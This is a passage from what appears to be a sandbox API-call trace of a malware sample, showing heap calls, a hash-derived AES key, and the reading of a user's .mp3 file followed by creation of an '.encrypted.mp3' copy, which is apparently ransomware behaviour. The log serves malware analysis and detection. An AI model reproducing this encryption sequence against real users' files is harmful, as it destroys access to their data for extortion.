(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.745] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.746] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.746] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.746] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.746] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0037.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.746] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0037.746] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.747] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.747] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.747] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.747] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.747] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0037.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.747] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0037.747] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.748] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.748] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0037.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0037.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0037.748] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0037.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0037.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.749] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0037.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0037.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0037.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.749] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.749] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0037.749] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.749] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0037.749] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.749] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.749] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0037.749] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.749] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.749] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0037.749] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.749] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.749] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0037.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0037.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.750] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0037.750] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.750] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0037.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0037.750] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.750] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0037.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0037.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.750] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.750] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0037.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.751] CryptDestroyHash (hHash=0x7c2100) returned 1 [0037.751] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.751] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.751] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.751] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0037.751] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\shi6u88nczyga2zyk.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.751] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.751] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0037.751] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.751] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.751] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.encrypted.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\shi6u88nczyga2zyk.encrypted.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.752] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.752] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.752] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.752] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.752] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0037.752] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0037.754] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x52c0, lpOverlapped=0x0) returned 1 [0037.754] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0037.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.759] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.760] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.760] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.760] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0037.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.761] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.761] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.761] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0037.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0037.761] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.761] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0037.762] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.762] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.762] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.762] 